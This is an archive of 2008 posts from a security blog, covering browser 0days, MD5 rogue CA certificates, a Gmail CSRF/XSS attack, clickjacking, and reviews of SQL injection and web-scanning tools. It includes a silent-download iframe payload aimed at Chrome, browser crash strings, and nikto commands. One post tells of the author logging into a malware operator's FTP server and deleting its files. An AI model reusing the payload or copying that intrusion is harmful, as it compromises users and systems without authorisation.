Tuesday, December 30, 2008

Rogue CA certificates through MD5 collisions

| Armando Romeo |
Researchers Sotirov and others, provided practical proof of concept of a well known but till now theoretical threat: MD5 collisions.


Today, At the 25c3 conference in Berlin, it has been shown how possible it is to find a collision with one of the browser-embedded trusted root CA's signatures to build a new rogue CA capable of signing rogue websites certificates. These certificates would then be accepted by the browser advertising a completely secure and reliable connection.

It's the first time that this is put in place and according to authors of research over 100 Play stations 3 have been using to match the collisions.

This successful proof of concept shows that the certificate validation performed by browsers can be subverted and malicious attackers might be able to monitor or tamper with data sent to secure websites. Banking and e-commerce sites are particularly at risk because of the high value of the information secured with HTTPS on those sites. With a rogue CA certificate, attackers would be able to execute practically undetectable phishing attacks against such sites
More on the research can be found here,

Monday, December 29, 2008

Winner of the Survey contest is...

| Armando Romeo |
etr[**]acers1@verizon.net who has already received the HSC Ethical Hacker Kit as the prize of the contest.

The survey collected almost 100 responses, very useful to us to understand, where we were and where we are now in the everyday challenge to make our site a useful one-stop place for security people.

Personally, I expected more criticisms on the layout and navigability. They instead proved to be very appreciated although some improvements were suggested.

Most of our visitors asked for more contents: Tools, Exploits and new researches above all.

As you may already have noticed, we are adding the most important exploits everyday, not just as an external link, but as our own content.
Moreover, Basher is taking care of the tools and we are having 2-3 new tools everyweek, with snapshots and descriptions.


As I am personally more and more busy with Security Brigade and the old staff is busy with everyday job we are still looking for people willing to take part of our projects. We mainly need webdevelopers and content providers. And we are open to anyone willing to exploit our big audience to start blogging in our blogs.

I have many projects, on my papers, I only need help from you ;)

Anyway, I wish a great 2009 to all of our members!

Wednesday, December 10, 2008

IE7 Exploits for XP and Vista published

| Armando Romeo |
After few hours from our last post milw0rm publishes the POC of the 0days Internet Explorer 7 bot on XP SP3 and Vista Sp0.
Vista SP1 users are advised not to use IE7 either until Microsoft provides a patch (unpublished exploit for SP1 may still be in the wild).

Proof of concepts for XP and Vista.

If you want a long term patch please go here

IE 7 0day allows malware spreading

| Armando Romeo |
A patch for Internet Explorer 7 on Windows XP SP2 should be available shortly as a new 0day has been uncovered in a chinese forum.

The 0day seems to be exploiting a vulnerability in XML handling and allows for silent download and execution. More details will be added later.

The story is available here

Tuesday, December 9, 2008

Obama and the new CyberSecurity Army

| Armando Romeo |
President Obama will officially announce a new department to protect cyberspace from hackers, thieves and foreign agents, coordinating security efforts across U.S. military, intelligence and civilian agencies.

The new effort is meant to protect US government assets from random hackers but above all from foreign governments threats.

Although the name of the department will still be "Einstein", created by GW Bush, it will have much more power to to respond and defeat cyber threats.

U.S. options could include trade or financial sanctions or military attacks in response to hacking attempts

It seems to me that we are giving more power to the hackers this way. And it's a big mistake.
Fighting cybercrime should be a a cyber fight. A skills fight.

If a bunch of hackers will have the power to cause financial sanctions (not to talk about militiary attacks) more and more people will try to hack penthagon.

You cannot demonstrate whether it was a chinese hacker to break into Merkel's laptop launching an attack from there. Would they bomb Germany?

Monday, December 8, 2008

AVID - Antivirus is Dead!

| Yash Kadakia |
Late last night I was surfing some forums looking at interesting posts and I noticed one about an MD5 Cracker that utilized various Free Online Services.

Intrigued I downloaded this utility, However suspecting a virus or trojan of some kind, I ran this utility through 37 Anti-Virus Scanners via VirusTotal - Free Online Virus and Malware Scan. Nothing!!. Every scanner on the market gave it a clean-chit including every single heuristic feature these scanners boast.

Being as paranoid as I am, I finally ran this utility through Sandboxie. A few seconds later, Comodo Firewall Pro came up with an alert: The utility was trying to connect to an FTP Server. Instantly I ran Wireshark and sniffed the Username/Password credentials for the FTP Server.

I put these details into Filezilla and in a few seconds I was connect to the server. The server was filled with log files from hundreds of users. The malware had dumped Saved Passwords from IE, Chrome, Firefox etc and uploaded these log files onto the server. After downloading a few of these files for deeper investigation, I deleted every file on the server to ensure that the compromised users would not have their information hi-jacked.

On further investigation of the log files, the virus seemed to be one from mutX.org. I was thoroughly disappointed that a known virus-strain could evade every single Anti-Virus scanner on the market even though it had such obvious heuristic traits such as: dumping information from browsers, msn messenger and uploading it to a rogue ftp server.

This entire episode reminded me about a Podcast I heard last week where Robin Bloor was a guest discussing AVID (Antivirus is Dead). After this particular incident, I couldn't agree more with Robin. If this particular incident had targeted an Organization as opposed to some Security Forums, it could have cause massive damage and probable financial loss to these organizations.

I have always been a fan of Layering Security and in this particular instance layering Avira Antivir, Comodo Firewall Pro, Sandboxie etc together really paid off.

Originally from: Yash Kadakia's Blog

Sunday, November 30, 2008

FEDs can lojack mobiles without telco help

| w0lf |
An article states that government can determine location of mobile phones without the help of Telco. They can do this by cell-site simulators or digital analyzers called Trigger-Fish. Well nothing new about this technology. It had been well known from Mitnick's time when Tsutomu Shimomura used to track him.

But recently there had been many issues as
ACLU and Electronic Frontier Foundation have received several batches of Justice Department documents in response to the Freedom of Information Act (FOIA) request (and subsequent lawsuit) for records relating to the government’s use of cell phones as tracking devices. This has raised an alert lately as they will do this without court permissions.

Triggerfish is supposedly to be sold only to law enforcements and was agreed to be used only with proper court permission. But recent buzz seems that the later is not required. So the American Civil Liberties Union and the Electronic Frontier Foundation (EFF) filed a lawsuit in July 2008 urging a federal court to order the Department of Justice (DOJ) to turn over records related to the government's use of people's cell phones as tracking devices.


As one of the documents intended to provide guidance for DOJ employees explains, triggerfish can be deployed "without the user knowing about it, and without involving the cell phone provider." That may be significant because the legal rulings requiring law enforcement to meet a high "probable cause" standard before acquiring cell location records have, thus far, pertained to requests for information from providers, pursuant to statutes such as the Communications Assistance for Law Enforcement Act (CALEA) and the Stored Communications Act.


Tuesday, November 25, 2008

Gmail flaw can make you lose your domain or more

| Armando Romeo |
Yesterday a new POC appeared online. A new Gmail flaw, a mixture of CSRF and XSS, targeting gmail filters is capable of taking out accounts by redirecting your emails to attacker owned email addresses.

The Gmail filter is capable of setting up rules based on the sender email address. These rules include redirecting to another email account and deleting the message. This is just what Brandon needed to setup his Godaddy's account hijacking POC.



The attack goes as follows:
  • The victim's Gmail cookie is stolen to unveil the GMAIL_AT value. This is a session-bound authorization key needed later in the attack (XSS)
  • The victim is induced into visiting Gmail triggering a new filter that redirects all the emails coming from an online service, for the POC Godaddy. The victim must have used the Gmail email to register on the online service. This is where the GMAIL_AT values turns useful as the CSRF request to add a new filter needs this value to be successfully triggered (CSRF)
To take over the Godaddy account, Brandon used the Reset Password form. Godaddy's authorization code to reset the password would then be redirected to the hacker's email.

This can be adjusted to a number of other services online.
The attack is not as easy as it seems. The most difficult part is to retrieve the GMAIL_AT value through a xss. Using NoScript would help while waiting for Google to patch the flaw.

Monday, November 17, 2008

Web 2.0? Brothel of Social media whores

| Armando Romeo |
Web 2.0 is not just a bunch of new technologies melt together to build a new concept of the web.
It's turning upside down the way the web was conceived at first.
In the old web, websites fed visitors through contents. With web 2.0 visitors feed websites
with their own content. What is bad in my opinion is taht, in the last 2 years of web 2.0 this content has been our own lives, photos, postal addresses, habits, likes and dislikes. (Well actually not mine).

People has been feeding these websites with almost everything they can say about themselves. (With a bunch of made up lies to appear smarter).
If there was so many smart people as Facebook profiles show, there would be no Facebook at all probably.

Although you will never see my name on Facebook or similar amenities, I wouldn't blame Facebook and the other social networks.

They are just giving people what they have been waiting for years. Their 15 minutes of fame camouflaged under the "connect with your friends". And they made some good cash too.

Have you ever seen people fighting in real life and then be "friends" on Facebook. Well I have.
I'm amazed at how good such websites are to have people make up with each others.

Facebook is the most successful peacekeeper after 2nd world war.

I can't help the rapid growth of social media whores, (smores as Kawasaki uses to call them) but I sure can be concerned at how these social networks have distorted the use of the web 2.0 in terms of privacy. People is still too freaked out to listen to these rants. The hype will go on for a while. Privacy is a void word. Has it any meaning nowadays anymore?

...when your President silently grants legal immunity to telco companies systematically abusing of your privacy ?Retroactively.

With Social networking explosion, someone has ranted about privacy and the social impact this may have.
Someone smarter has seen a business through it. New start ups have been raised up from these concerns.
Not helping it. But worsening it.
Or just proving that the rants of the old school people had some truth.
At least they say it clear:


Pay to know people's life before you hire them. Cause they're on Facebook. How to blame them.
You see the forest. If you pay you see the tree and all his leaves.

Spokeo is amazing. Take some minutes to try it. Cause it gives amazing results. It's a good termometer of yourself positioning in the smores chart.

But it's not the only. Wink is another. YoName another.

Coca-Cola, Blockbuster, Verizon, Sony Pictures and Condé Nast have come on board. On Facebook board. Guess what? How do you think they will use your habits?

Why spending millions on ads on TV shows. TV is in broadcast. Facebook is targeted.
Social Networks is a breakthrough for Marketing. Same as Switches versus Hubs.

I'm waiting for new technologies of photo-recognition through.
Recognizing acne from your picture can be so compelling to cosmetic companies marketing dept.
Don't you think?

Ah btw, if you want to increase your Facebook friend list, here is a smore telling us how
So I'll start.

Monday, October 20, 2008

My picks for hakin9 news

| Armando Romeo |
hakin9 is bimonthly magazine about hacking and IT security, available in 7 languages, covering techniques of breaking into computer systems, defense and protection methods from a learn by practice perspective. This means you don't find abstract theory. Every article is supported by tested source code and proof of concept. This what makes the difference from other similar journals in my opinion.

I'm very proud to be a stable contributor to the magazine providing the hottest news in the industry for every issue.

I have complete freedom of choice both in picking the best news and what to write about them. This means you read unbiased reviews and vendor-independent tests.



(Image refers to issue n.5 available now, next issue cover is not yet finalized)

I just finished to write the last news for the next issue that should be available for everyone in a month. So I thought to list here my picks as a summary of what happened in the security industry in the last 2 months

  1. Clickjacking vulnerability explosion
    It was impossible not to write something about the most discussed vulnerability in the web application security field since weeks...
  2. Google Chrome release
    We all know the breakthrough of the month was the new browser released by Google...with annexed all the bugs shipped with it
  3. T-mobile data breach
    Over 11 millions customers data exposed...
  4. Privacy in the couterterrorism era
    Finally U.S. National Research Council realized that may be privacy of U.S. citizen has been abused too much in the name of the anti-terror fight
  5. Graphic cards cracking WPA2
    With new graphic cards, much more power is available for videogames...and wireless cracking
  6. World's most popular smartcard hacked
    The hack-the-rfid saga goes on with more issues for the top seller in the field
hakin9 is available in printed and digital version. If you want to become an author just mail me and I will route you to the right person.

Wednesday, October 8, 2008

ClickJacking Explained

| Yash Kadakia |
What is ClickJacking?
ClickJacking is a relatively old vulnerabilitiy that has been around since 2003-2004, however it has been recently brought back to life by Robert Hansen and Jeremiah Grossman. ClickJacking is a little bit difficult to explain however try to imagine any button that you see in your browser from the Wire Transfer Button on your Bank, Post Blog button on your blog, Add user button on your web-site etc. ClickJacking gives the attacker to ability to invisibly float these buttons on-top of other innocent looking objects in your browser. So when you try to click on the innocent object, you are actually clicking on the malicious button that is floating on top invisibly.

So while you are simply trying to close the javascript pop-up on your screen, play a flash game or interact with some ajax web-site -- you might really be clicking on the button to wire-transfer money to a russian bank account.

A slightly more technical description would be: A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies. The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items,' 'click to add Bob as a admin,' etc. It may then provide its own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it.

In other words, the hacker would dupe users into visiting a malicious page -- through the usual methods -- but then hide the nasty bits under what appears to be the real-deal content from a legitimate site.

How Serious is ClickJacking?
On its own ClickJacking doesn't sound to be a very serious vulnerability, since user interaction is required. However as I have always said, in the world of vulnerabilities 1+1 does not always equal to 2, and might just equal to 10^2. By this I simply mean, that ClickJacking in combination with other vulnerabilities could become a very serious issue.

Example - ClickJacking can Spy on your Webcam and Microphone
Just as I wrote this blogpost a new use for ClickJacking has been disclosed where it can be used to spy on your Microphone and Webcam. This is based on a new vulnerability discovered in Adobe's Flash Software and published about on Guya.net, Rsnake's Blog and Jerremiah Grossman's Blog.

A particular vulnerability exists in Adobe's Flash Software, which allows the malicious attacker to use ClickJacking to gain access to the user's web-cam and microphone.

The vulnerability works as follows:
1) You visit a web-page with a flash application/game embedded in it.
2) You click on the flash button.
3) Your click is "click-jacked" into allowing the server to access your web-cam and microphone.

Whatis really happening:
1) You visit the web-page, in the back the target application (in this case Adobe's Settings Panel) is loaded and made invisible. The Allow button is made to float invisibly.
2) While you click on the flash button, the invisible Allow button is floating on top of the flash button and actually receives your click.
3) The Flash application now has full permission to access your web-cam, microphone etc and even have it stream to a server where it is recorded for future viewing.

You can see a video of this in action at: Youtube and Vimeo.

Cross Posted from Yash Kadakia's Blog - ClickJacking Explained.

Sunday, October 5, 2008

Visa Mastercard and Ftc drivers for security investments

| Armando Romeo |
I've always thought that the only way for companies and organization to give some serious interest into security is through law enforcement, compliances and heavy fines on data breaches.

In places where security is still unknown and law enforcements cannot be taken in place, buying online or simply providing personal data is still a risk. I am thinking about those countries in which the internet based services are still not so spread and so green that any laws on this direction would slow down the investments on innovation in the field.


TJX, sure, demonstrated that compliance is not enough. But TJX serves as a case for all the other companies.

A driver for more investments in security. This is what the field needs to increase awareness of the problem, unfortunately.

The difficulty into configuring security investements into a mere ROI plan plays a big role here.
Lack of exact figures of both incidents and cost for insecurity makes things worse.
Convincing companies into spending on security involves now showing figures of fines and cost of insecurity.
And cases like TJX is just the most visible example.

Mastercard and Visa have published schedules of fines for merchants who are non-compliant and a further set of penalties for merchants who experience a compromise of Credit Card Data
In most cases credit cards theft costs $25 (€ equivalent) per card number disclosed
and the cost of the forensic investigation will also be levied.

This easily becomes hundreds thousand dollars for small merchants up to million dollars for bigger ones.

Moreover FTC, Federal Trade Commission, in the US, plays another driver role for security investments.

The fines applied on data breach, being it SSN disclosure or privacy policy violation, are extremely tough.
Companies that have experienced information security breaches are required to notify not only the individuals whose personal information was impacted but also numerous state regulators that will, in most of the cases, open an investigation that may take up to 2 years.

If the company is found to be in violation of the federal laws on privacy and data security retention has to face fines and obligation for the 20 years following the incidents. 20 years yes.
FTC enforces independent biennal security assessments, compliance papers and data retention policies revised periodically.

The cost of such incidents is a sum of legal expenses (that in many cases fall in class actions category), compliance cost, bureaucracy costs (not to be understimated here since it's a long process) and fines.

ChoicePoint Inc, agreed to pay $10 Million in federal fines for identity theft of 160,000 people
plus $5 Million to compensate people who suffered as a result of the breach.
These numbers talk on them selves without the need for further FUD (Fear Uncertainty Doubt).
FTC is only in the US. I'm not aware of anything similar in Europe.
US are serious about your privacy

Friday, September 19, 2008

Noscript vs SurfJacking

| Armando Romeo |
Giorgio has added a new special feature to popular Noscript.

With new version 1.8.13 is now possible to force HTTPS on a (wildcard) list of websites and many other features regarding safety of the Https.
This comes in useful at protecting from SurfJacking attack put in practice by Sandro Gauci's tool.


Although Gmail solved the Surf jacking issue, that could lead to cookie stealing through a sophisticated hijacking, too many websites are still vulnerable to this kind of attack.

Now there's no additional work to do except providing a list of websites to Noscript and have it do the protection for us above all when we are in a hostile environment like an internet cafe or a open wifi connection.

Basically Noscript adds the secure flag to cookies on the fly forcing the cookie to be sent only on https connections.

Very good. When will Noscript be embedded in Mozilla off-the-shelf?

Anyway, this was a quick post. Time to fill my encypted cookies website list...

Thursday, September 4, 2008

Google Chrome Silent File Download Exploit

| Armando Romeo |

As I said my previous post was destined to be outated very soon.

This is what appeared few minutes ago on milw0rm and packetstorm:


< script > document.write('< iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0" >'); < / script >

This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.

Today Hackers Center stats showed 13% of visitors using the new raw browser.
This is temporary peak, but still scary considering all the bugs found in less than 48 hours.


I think Google will soon regret about this too-soon release

Wednesday, September 3, 2008

Google Chrome vulnerabilities list

| Armando Romeo |

Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I'm not going to review Google Chrome's features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in few hours)

Rishi Narang has been the first. A Denial Of Service simple as pie:

Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):

CRASH ME

Just "evil:%" in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).

Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it's worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

Good thing is that the browser doesn't need Administrator rights to run.

Matt Cutt from his blog has stated that the chapter 11 of Eula will be updated. Yes the chapter about you giving all the rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I'm worried about the enthusiastic reviews I see online.
Google brand was enough to push an unfinished product up to make it 1% of the User-Agent's used on its very first day.
The risk is high, fuzzers are still crunching...

Monday, September 1, 2008

WhiteHat website vulnerabilities stats

| Armando Romeo |
WhiteHat security showed some numbers based on the stats collected by real word assessments they carried out on 687 custom-code websites (so no "known" publicly available vulnerabilities stats here)

Jeremiah's webinar was quite interesting and showing such numbers is not a common practice either.
So before any comments, kudos to Jeremiah.


The most interesting of the stats are the type of vulnerabilities found that I wish to add my comments to.


67% of sites suffer from Cross site scripting
Not a big surprise here. I'd have expected even bigger numbers here. Probably .NET framework xss prevention played some role here.
XSS is still on top of top of owasp 10 vulnerabilities a lot of research has been made and a lot of discussion on xss prevention is going on but developers still fail to sanitize and encode input/output.

The only solution I see here is to prevent developers from writing buggy code through the use of robust frameworks since years of tutorials, conferences and best practicea don't seem to have worked.


17% of sites suffer from SQL Injection
SQL injection is easier to prevent. Remediation/development units of an organization tend to prioritize this kind of vulnerability cause its danger is felt more real compared to xss.

The attack to organization's data has more "emotional impact" over the management and executive units than xss.
Xss takes more priority when it is persistent anyway.

SQL Injection prevention is also better understood from a remediation report. With prepared statement or proper input sanitization the vulnerability is away.
Forcing developers to use prepared statement would drop this percentage near to zero.

As Jeremiah said CSRF made its appearance for the first time in the stats.
But honestly speaking, 8% for this vulnerability had something suspicious to me.


Someone asked more information on this before me.

Jeremiah says explicitly that these numbers are based on the effectiveness of automated tools they use.
And adds that real numbers for CSRF are approaching 75%.

This is what I thought at first indeed.

At now all the companies are relying upon automated tools that are not able to cover such kind of vulnerabilities that require a manual testing for their discovery.

This is where the industry is stuck.
Relying upon tools that are not able to catch them all (logic flaws here too) and keeping manual testing at a minimum to keep low fares and win competition.

Not that this is a sin by security services vendors, but the 8% of CSRF is symptom of a commonly accepted failure of such tools.

Accepted by companies that cannot afford a manual reviews (when feasible anyway) and accepted by security services providers who earn money with much less efforts.

My question is: How could have, a tool, discovered a logic flaw like the latest big Joomla exploit?
Probably only a source code audit could have uncovered it (probably). But who is auditing souce code anymore when you have tools?
Smells like the old "false sense of security" here.

Wednesday, August 27, 2008

The best SQL Injection tools classified

| Armando Romeo |

Continuing my review of the best penetration testers tools, it's time to face the most dangerous vulnerability a website may suffer in regards to data protection : SQL Injection.
I'm not going through the sql injection basis as we already have a nice guide in depth and there is a number of references on the internet.
But I'm going to make some rough classification of every tool listed so that this can serve as a quick reference.

I am going to list here the most used tools for sql injection exploitation. There are some others to find the sql injection in a website as well. But this shouldn't be an issue for a professional.

The explotitaion tools work for different kind of DBMS and using different techniques such as error based sql injection, inband or union based sql injection and blind sql injection.

To date, MS SQL Server is the DBMS that has the highest number
of attacking tools available. It is prone to error based sql injection thus retrieving data from it is as easy as providing the vulnerable url to tools like Priamos and Absinthe and clicking a button.
These tools are not free from bugs. Sometimes they fail to receive correct data, but if you're not a script kiddie there's no way you can miss it.

Priamos

  • Works on SQL server only
  • Enumerates databases, tables and data in a very nice GUI
  • The only big problem is that it works only with GET requests, unless you make it pass through a proxy to change the request to POST and shift the query string to the http request payload.
  • Allows for proxy tunneling
  • Very fast

Absinthe
Beside some bugs that affect the tool, 2.0b version works with

  • Blind sqli
  • Error based sqli
and does a better job than 1.41 version.

Blind mode supports: SQL Server, Postgre, Sybase, Oracle.
Error based mode supports SQL Server

  • good GUI from which fine tuning the injection parameters and additional options like authentication.


Injection is feasible through

  • POST
  • GET
  • COOKIE

Allows for proxy tunneling

SQLMap
It's the best tool to deal with Mysql sql injections. The only tool that does the job sometimes.

  • It's python powered so it's cross platform.

It supports:

  • MySQL
  • Oracle
  • PostgreSQL
  • Microsoft SQL Server.

SQLmap supports two operating modes:

  • Blind SQLi
  • Inband (Union) Sqli

Before going for Blind sql injection, that is slow and requires a lot of requests to the server, it is possible to check for UNION based sqli availability that gives faster results.

SQLmap performs blind sqli recognition through hashes of the http response text. It is possible to specify the string to match in the response text when the case is TRUE. A very needed feature sometimes.

It supports injection into

  • GET
  • POST
  • COOKIE
  • USER-AGENT

and retrieves:

  • databases username and password
  • DBMS version
  • databases
  • tables
  • data
It allows to execute custom SQL queries as if you were on a real SQL client connected to the remote DBMS. This saves a lot of time and allows for very sophisticated data retrieval.

More options are:

  • proxy support
  • google dorks
  • remote file retrieval.

In the tool package a very nice guide on the tool usage is given

Automagic
It's written in perl and requires that you read the guide or watch the nice flash video before you can really enjoy it.

It works only against SQL Server DBMS and performs dumo of

  • database
  • tables
  • data

It is possible to retrieve DBMS users and passwords. It's quite fast, in my opinion Priamos and Absinthe do a better job.
A good backup tool though.


To sum up

Mysql SQL Injection tools:

  • SQL Map (blind and inband)

Oracle SQL Injection tools:

  • SQL Map (inband)
  • Absinthe (blind)

Sybase SQL Injection tools:

  • Absinthe (blind)

MS SQL Server SQL Injection tools:

  • Atomagic (error)
  • SQL Map (error and inband)
  • Priamos (error)
  • Absinthe (error)


If the list is not exhaustive...well...these at least are the most known and used.
Of course every professional has his own tools and patches to improve these tools or adding functionalities. Your own tool is always the best tool.
Any suggestion or addition is encouraged!

Friday, August 8, 2008

iPhone owns you : Warshipping

| Armando Romeo |

You have a package sitting in your shipping department addressed to "U R Owned, INC." ? Well, it may be David Maynor, CTO of Errata Sec, trying to Warshipping you !


In my opinion this is the most clever research I've heard so far in the war driving field. Basically David, is using an iPhone, empowered with passive sniffing tools to make a reconaissance tour of the inner wifi networks of a company without being right there with a car and huge antennas pretending to be TV technicians fixing cable TV.



The package would be shipped to a non-existent recipient at the company's address and probably stay there for some time (the recipient is non-existent) and then being sent back.

The iPhone 3g, under At&t network coverage could be even capable of receiving new commands like a real trojan horse, but I guess this was not the main purpose of the research. But surely feasible.

David Maynor is presenting this research today at Defcon and new details will be available soon.

Thursday, August 7, 2008

DNS cache poisoning, first attacks

| Armando Romeo |

From this (funny) video, I have found on Kaminsky blog (the guy who gave new life to the old DNS cache poisoning issue) seems that large part of the major ISP's DNS servers have been patched.

After Kaminsky's publication of the vulnerability exploit code gone wild and ported to HD Moore's Metasploit framework just few days late.

Not even 2 weeks after the breakthrough, HD Moore's company web site has been hijacked by spammers poisonoing At&T DNS Server serving his company's website. Hilarious, but sh*t happens. Above all when it's not up to you or under your control.

Yesterday, Black Hat day 1, Kaminsky gave more details on the patching status of the main ISP's and all the unpublished details about the attack.
It's only a matter of patching now, since everything is public.

Monday, August 4, 2008

Gary the Ufo Hacker

| Armando Romeo |

This is how they call him. The all-times best hacker. I'm not sure if it's true or not, but since Mitnick "just" used social engineering to own the top world companies, I might say Gary may easily be called such.

He managed to break into US military networks from his bedroom. Using a 56K dial up. Once again this is what the press says, I don't trust press writing about hackers anymore, I've read enough of their fake stories.

But this time I feel we are really against someone who will hit history books.

For his skills and above all for his attacks main focus: finding evidences of extraterrestrial life and hidden governments projects.

Something, I personally judge the best reason you can have if you're going to risk 60 years of jail, extradition and imprisonment in Guantanamo.

Where you won't get a (real) lawyer. At least this is what the TV tells us in Europe, but if you're a US reader you may have different information.

The 42 years old man, mainly took control of US military machines through blank or default password-protected operatying systems.

It seems that while we go after super advanced attacking techniques and exploit codes, the best hackers are still the ones who are able to exploit the most widespread vulnerability of this world: stupidity.

If I had to break into some (supposed) super secured system I would start thinking of all the most elite exploits I could think of and probably forget about simple blank password trials. Am I overestimating Govt's security guys?

Hackers are running much faster than system administrators. And system administrators silliness don't make all the hacking research effort worth it.
Nasa, please at least provide some passwords to your systems. Even 4-5 figures number. Or hackers will be depressed.

Thursday, July 24, 2008

Penetration testing tools - Nikto

| Armando Romeo |

Nikto is a web server security assessment tool. It is designed to find various default and insecure files, configurations and programs on any type of web server. Definately one of the most preferred free web app scanners available.

After a small vacation I'm back on the series of the best tools for web application penetration testers. Last time we gave a look at dirbuster in the category of information gathering. It was hard to pick one among all the nice tools around to fuzz and discover hidden parts of a web site.

Another similar tool I like is wfuzz, that works both through dictionary and brute force.

But this time I'm going to talk about nikto as it is one of the most known and used web application security scanners.

Quoting from the author's website

Nikto checks for 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers.

A good thing is that nikto database of vulnerabilities can be updated easily from the command line (it's a command line tool written in perl btw).

Nikto is especially good once we have discovered what's running on the target web server and we want to know what's vulnerable.

Nikto is not meant as an attacking tool. It is more a vulnerability assessment tool that tries known exploits against the target to trigger known behaviours. When this happens it is reported to the user.
Nikto is not only useful in case the target has some off the shelf code known to be vulnerable to some publicly available exploit. But also helps at discovering known web server misconfigurations.

First useful thing that Nikto does when launched against a web site is to fingerprint the web server version.
Then tries all the signature database against the website according to the enabled tests (all by default).
This causes a big "noise" in the website log as it doesn't seem to narrow down the type of attacks according to the type of software found on the webserver, but this shouldn't be a problem for an authorized penetration testing job.
Joomla is a nice example: Nikto tries all the known exploits against joomla components even if these components are not installed on the Joomla distro it is assessing.
So 90% of the trials are non-sense while a more intelligent way to do it would have been to recognize what is installed and then try the exploits accordingly. But yeah, nikto is open source and anyone can adjust its functioning.

Nikto provides a good degree of flexibility by allowing the pen tester to tune the scan enabling only certain kinds of vulnerabilities to be tested such as Misconfiguration/default files, Information disclosure, Interesting file/seen in logs etc.

These can be enabled/disabled easily using the -Tuning switch followed by the reference number you can find in the nikto manual in the package.

This is an example that will trigger the tests of Remote File Retrieval and Command execution only:

perl nikto.pl -h 192.168.0.1 -T 58

with the "x" we exclude the two and enable all the rest:

perl nikto.pl -h 192.168.0.1 -T 58x

My favourite test is the number 1 : "Interesting File / Seen in logs" , it sometimes shows interesting stuff that can be very helpful for the whole penetration testing endeavours.

As a last note, false positive is probably the only problem affecting nikto. It sometimes reports completely meaninlgess threats so manual verification must be taken to validate the scan results.

Wednesday, July 9, 2008

Penetration testing tools - DirBuster

| Armando Romeo |
I decided to take a break from giving my two cents about the hot topics in the security industry and write some posts about the best tools for a web application penetration tester.

The selected tools are the ones I personally use every day and know better.
Comments are welcome on alternatives available in the open source area since I'm not going through commercial tools.

The tools order will follow the natural order of use: Information gathering tools, Proxy tools (for manual exploration/exploitation), Attacking tools.

DirBuster
Among the information gathering tools DirBuster is one of the most effective (surprising sometimes) when trying to widen the attacking surface.


A penetration tester must ensure, before any attacking attempt, to have the widest "sight" of the application and find out all the hidden features that the developer may have left somewhere in the web site root.
This is just the purpose of DirBuster.

The difference between a simple spider and DirBuster is that DirBuster sees what a spider can't !

DirBuster is an OWASP project aimed at discovering all those directories or files that a spider/crawler is not able to pick. It works using a wordlist of different sizes to check the existence of such files or as a fuzzer/brute forcer.

Web application developers tend to give common names to files or folders meant to be hidden relying on the fact that these files or folders are not linked and as such hidden from crawlers.

Wrong developers! Never play security by obscurity!

Folders like /admin, /administrator or /private and similar are included in the directory names lists provided with the tool.
In my personal experience the use of just the small directory names lists will discover a lot of interesting stuff while using the fuzzer you can exploit business logic flaws as well.

Another nice usage of this tool is when you encounter a password protected folder. In one of my recent penetration testing efforts I had a password protected /admin directory. The use of DirBuster fuzzer found out the existence of a bunch of files, in that directory, not being protected (the loggedin status hence the session var was not checked) and as such freely available without bruteforcing the authentication
credentials.

The fuzzer sometimes hangs, the project is still in beta. I hope they can improve it because it is essential and very easy to use.
As an altearnative to path fuzzer/brute forcer I use webscarab or webshag.

DirBuster addons are:

- capability of using custom headers (you can use your own cookie)
- capability of using a proxy
- adding new HTML elemtns to extract links from

This is one of the first tool I fire up when starting a new job. It's extremely useful, lightweight and surprising!

Next time: Nikto/Wikto

Friday, June 27, 2008

Waf me not

| Armando Romeo |
Which side of the field are you in?

There's only one hot topic in the industry right now:
Web application firewalls.

Infosec big names are fighting a war worth millions dollars on the Web Application Firewalls as a viable solution to web application security issues.

Understanding the parties in the field is critical to understand the discussion and not being fooled by subliminal marketing messages.


A CTO of a company X, in order to become PCI compliant, reads the compliance paper. And there is written that you have two options:
Source code review
OR
Web application Firewall

What kind of expectations does he have here from a WAF? He trusts the PCI standard. He thinks that if WAF is an alternative to source code analysis then they provide more or less the same security.

So, WAF vendors, empowered by PCI compliances, can push their products and advertise them as a security plug-n-play solution.

There's nothing worse than a false sense of safety.

Feeling self confident about security because you have a WAF in front of your Web Server is the beginning of all your problems.

I have read some WAF vendor commenting on some blog posts. They are all like "yes, we never said it is a bullet-proof indeed it's just part of a broader solution we offer".

What kind of other broader solution? VA+WAF ?
Is this really the security companies need?
Do you really think that automated tools (the ones we have now) are capable of securing something?

Automated tools that miserably fail to detect even blind sql injections or CSRF vulnerabilities that suggest the rules to a WAF that is miserably unable to protect against simple, very simple coding errors like the proper check of an authentication cookie a logic flaw or an information leakage bug?

And no, taking the web to what it was 3-4 years ago, by encrypting querystring to prevent tampering is not the solution in my opinion.
The trade off between business and security should be avoided as much as possible.

There's also a big difference from security needed and security required.

WAF's responds to a demand for required security.
A provable security.

"Hey I do care about my customers data. I have a WAF!"

A honest security consultancy company carrying out penetration testing and source code review responds to a security need.

"Hey I do care about my customers data. I have plenty of good guys trying to hack and fix me every month"

At SecurityBrigade, we do not push any WAF sale although we recognize it as a valid means to avoid common simple (but still dangerous) vulnerabilities.

We promote real (expert)man-made penetration testing jobs and source code reviews.

WAFs as further layers are proposed to clients in order to allow them to be covered from cases in which code changes from some reason and new vulnerabilites are introduced since our last review.
It must be made clear that the more they get distant from the source code reviewed the less the security level is. No matter how cool the WAF is.

Another aspect to take in consideration is the operational cost of such devices. Are they, all in all, worth the money?
Let's forget about PCI for a moment, are they really responding to the need for real Security? Not at the moment.
They are resonding to a quick-need for security.
That in the long run it becomes "cheap security".
And cheap refers to quality not to expense.

And by the way, I'm from the old-school side. I like innovation.
But we have to spend more on people not on technology.

Because my hotel in Paris, while writing this blog post, has asked me to send my credit card number by email.
